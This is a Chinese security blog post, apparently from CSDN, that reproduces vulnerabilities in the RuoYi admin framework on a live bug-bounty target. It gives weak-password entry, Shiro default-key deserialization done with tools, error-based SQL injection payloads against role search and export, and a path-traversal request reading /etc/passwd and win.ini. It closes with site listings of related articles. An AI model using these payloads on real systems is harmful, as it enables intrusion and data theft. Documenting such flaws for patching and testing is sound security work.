实战Src对ruoyi框架管理系统漏洞的复现

已于 2023-12-18 11:45:37 修改
阅读量4.7k 收藏 8
点赞数 6
分类专栏: SRC 文章标签: 网络 安全 网络安全 web安全
于 2023-12-18 10:38:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/135057047
版权

前言:

在挖src的时候,搜搜有没有后台弱口令能进去的:


发现一个弱口令进去后:


【这个蓝色的草丛居然堪比算是ruoyi的指纹】
 


看这界面,是不是很像ruoyi
插件一看:


前端vue.js

加上登录的cookie rememberMe:


【登录失败时bp抓包相应包有remeberMe=delete】
得知登录为shiro框架
八九不离十后台就是ruoyi框架的管理系统了

若依管理系统简介

若依管理系统(Ruoyi Admin System)是一款基于Java开发的开源后台管理系统,若依管理系统采用前后端分离架构,前端使用Vue.js框架,后端使用Spring Boot框架。
找了个ruoyi系统的例图如下:

漏洞一:若依前台默认shiro key命令执行漏洞

漏洞简介
若依默认使用shiro组件,所以可以试试shiro经典的反序列化 rememberMe漏洞来getshell。
直接工具一搜哈:

直接先爆破密钥,成功了血赚,失败了不亏,还有其他方法能得到AES的key
工具二搜哈:
【url和cookie配置好就直接搜哈】


这里发现了很多的漏洞:
[+] 存在Snakeyaml命令执行漏洞
[+] 存在JdbcTemplate漏洞
[+] 存在ReadFile(新)文件读取漏洞
[+] 存在ReadFile(老)文件读取漏洞
[+] 存在Thymeleaf模板注入漏洞
[+] 存在SQL(1)注入漏洞
[+] 存在SQL(2)注入漏洞
[+] 存在SQL(3)注入漏洞
[+] 存在Shiro框架
[+] 存在默认key:xxxxx
我们先针对shiro框架:
拿着key去工具一:

然后检测利用链,检测成功后就可以命令执行getshell了:

漏洞二:若依后台存在多处sql注入漏洞

第一处:


角色管理的搜索,bp拦截抓包:


poc:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
报错注入回显database():


poc2:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=¶ms[beginTime]=¶ms[endTime]=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select table_schema from information_schema.tables limit 0,1),0x7e))


爆到库名点到为止

第二处:


也是角色管理,在导出这里
poc:
params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

或者直接使用工具二

漏洞三:若依后台任意文件读取(CNVD-2021-01931)

直接get访问:
/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini

漏洞四:若依后台定时任务RCE

没有公网vps,无法复现

漏洞五:Thymeleaf模板注入漏洞

用工具二 ping+dnslog验证:

还有漏洞复现望补充

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

 

渗透测试老鸟-九青
关注
  • 6
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
若依框架漏洞(若依管理框架漏洞复现)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-28 4474
若依框架是一个 Java EE 企业级快速开发平台,基于经典技术组合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap),内置模块如:部门管理、角色用户、菜单及按钮授权、数据权限、系统参数、日志管理、通知公告等。在线定时任务配置;支持集群,支持多数据源,支持分布式事务。若依框架漏洞默认口令漏洞早期若依框架漏洞版本有反序列化漏洞 ,执行任意命令,漏洞复现,祭出fofa大法,fofa语法如下
若依管理框架-漏洞复现
千寻的博客
11-10 1850
RuoYi 是一个 Java EE 企业级快速开发平台,基于经典技术组合(Spring Boot、Apache Shiro、MyBatis、Thymeleaf、Bootstrap),内置模块如:部门管理、角色用户、菜单及按钮授权、数据权限、系统参数、日志管理、通知公告等。在线定时任务配置;支持集群,支持多数据源,支持分布式事务。
漏洞挖掘 | ruoyi框架管理系统漏洞
2301_80127209的博客
04-01 4580
在挖src的时候,可以通过信息收集收集弱口令,然后通过后台弱口令进入后台:发现一个弱口令进去后:【魔方老师提醒才发现,这个蓝色的草丛其实可以大致判断是若依系统】看这界面,是不是很像ruoyi插件一看:前端vue.js加上登录的cookie rememberMe:【登录失败时bp抓包相应包有remeberMe=delete】得知登录为shiro框架八九不离十后台就是ruoyi框架管理系统了。
记一次若依框架和Springboot常见报错的实战漏洞挖掘
最新发布
记录开发和安全学习过程中的点点滴滴
07-11 1384
又是摸鱼的一天,闲的没事,找个站玩玩,首先开局一个框,漏洞全靠扫,哦不对,全靠找.免责声明博文中涉及的方法可能带有危害性,仅供安全研究与教学之用,读者将其方法用作做其他用途,由读者承担全部法律及连带责任,文章作者不负任何责任.本次主要是对渗透测试中的一次实战进行记录,当然也是摸摸鱼的成果,主要是对若依常见的一些利用姿势和springboot的利用姿势做个总结
漏洞复现-Ruoyi若依系列
aming小老弟
05-02 2万+
官方漏洞历史文档。
漏洞复现若依系统后台SQL注入漏洞
晚风不及你
02-27 1244
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。
若依框架漏洞(若依管理系统漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-04 8196
若依管理系统是基于SpringBoot的权限管理系统,若依框架漏洞推荐使用zhzy的vulmap工具查看。 1.早期若依框架漏洞版本有反序列化漏洞 ,执行任意命令漏洞复现 祭出fofa大法,fofa语法如下 app="若依-管理系统" && body="admin" 利用工具检测漏洞 这里不提供,太多了,推荐使用zhzy的vulmap 利用poc执行任意命令 2后台登录若依管理系统后可以任意读取文件
apache shiro漏洞复现
赵花花08042的博客
12-13 750
在Shiro框架下,用户登陆成功后会生成一个经过加密的Cookie。
基于RuoYi的Java档案管理系统设计源码
03-29
这是一个基于RuoYi的Java档案管理系统设计,使用Java、Vue、JavaScript、HTML和Shell语言开发,包含812个文件。主要文件类型包括367个Java源文件、116个Vue文件、101个JavaScript文件、87个SVG文件、72个XML文件、13...
RuoYi框架RuoYi框架学习超简单案例 - 新闻管理系统(源码)
03-23
这个小项目基于RuoYi后台管理系统。是文章“【RuoYi框架RuoYi框架学习超简单案例 - 新闻管理系统(附源码)”中的源码。详细文章内容可以点击:https://blog.csdn.net/weixin_44034328/article/details/104081504
基于ruoyi框架的智慧化养老社区平台管理系统源码+数据库.zip
08-10
基于ruoyi框架的智慧化养老社区平台管理系统源码+数据库.zip 已获老师指导并通过的高分毕业设计项目,也可作为期末大作业和课程设计,纯手打高分项目,小白实战没难度。 基于ruoyi框架的智慧化养老社区平台管理...
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
12-16
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
若依框架(不分离)-存储型XSS漏洞修复
hanlt的专栏
12-09 1071
XSS
若依框架的暴力破解漏洞
千寻的博客
11-23 2145
由于图片验证码未做好`前后台的统一校验`,可重复利用验证码,以及无登录错误次数限制等,导致攻击者可对账号与密码进行的穷举测试,从而获取网站登录访问权限
漏洞复现若依系统Druid默认弱口令漏洞
晚风不及你
02-26 2835
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。
RuoYi-Vue代码常见漏洞修复
weixin_45816407的博客
07-31 1409
java -cp druid-1.2.15.jar com.alibaba.druid.filter.config.ConfigTools XXXXXX (数据库明文密码。当密码明文中出现了 “^” 符号时, 不可用命令行进行加密!会导致 “^” 符号缺失!启用配置 filter.config.enabled,值为 true。修改配置 password ,值为上面的生成的加密后的密码。打开注释,设置为自己的密码,重启即可。获得公钥,秘钥,以及加密后的密码。,值为上面生成的公钥。
漏洞复现若依系统默认弱口令漏洞
晚风不及你
02-26 1206
若依系统(RuoYi)是一套基于SpringBoot的权限管理系统,核心技术采用Spring、MyBatis、Shiro,众多政府、企业采用它作为某些系统的权限管理后台,使用率较高。
若依系统前后台漏洞大全
热门推荐
FY10033的博客
08-07 4万+
漏洞影响范围RuoYi
ruoyi漏洞总结
qq_59468567的博客
05-03 1903
baseurl 就有了,有的是全的 url,大多数是只给个 baseurl:prod-api,这类。js 下面有个 app.xxxxxx(一些个字母数字).js,直接里面搜。如果页面访问显示不正常,可添加默认访问路径尝试是否显示正常。若依有个特点,密码可能在前台直接显示,点击并能够成功登录。监控中存在大量接口路径,可通过未授权获取更多敏感信息在。图标和登录页面及验证码处的样式识别出若依。认证失败,无法访问系统资源。进行替换实现登录系统。数据库存在未授权访问。
RuoYi 后台管理系统教程
08-30
RuoYi后台管理系统是一种基于SpringBoot的权限管理系统,可以用于搭建多商户后台管理系统以及实现内容管理和商城业务。 关于RuoYi后台管理系统的教程,可以参考官方文档和在线教程资源。官方文档提供了详细的使用说明和配置指南,可以帮助用户了解系统的功能和使用方法。此外,还有许多在线教程资源,例如博客文章、视频教程和社区讨论,可以帮助用户更深入地学习和使用RuoYi后台管理系统。用户可以根据自己的需求和学习方式选择合适的教程资源来学习RuoYi后台管理系统。<span class="em">1</span><span class="em">2</span> #### 引用[.reference_title] - *1* [RuoYi-fast_java_RuoYi后台管理系统_](https://download.csdn.net/download/weixin_42683392/26271646)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [RuoYi-plus后台管理系统-其他](https://download.csdn.net/download/weixin_38562725/19582380)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值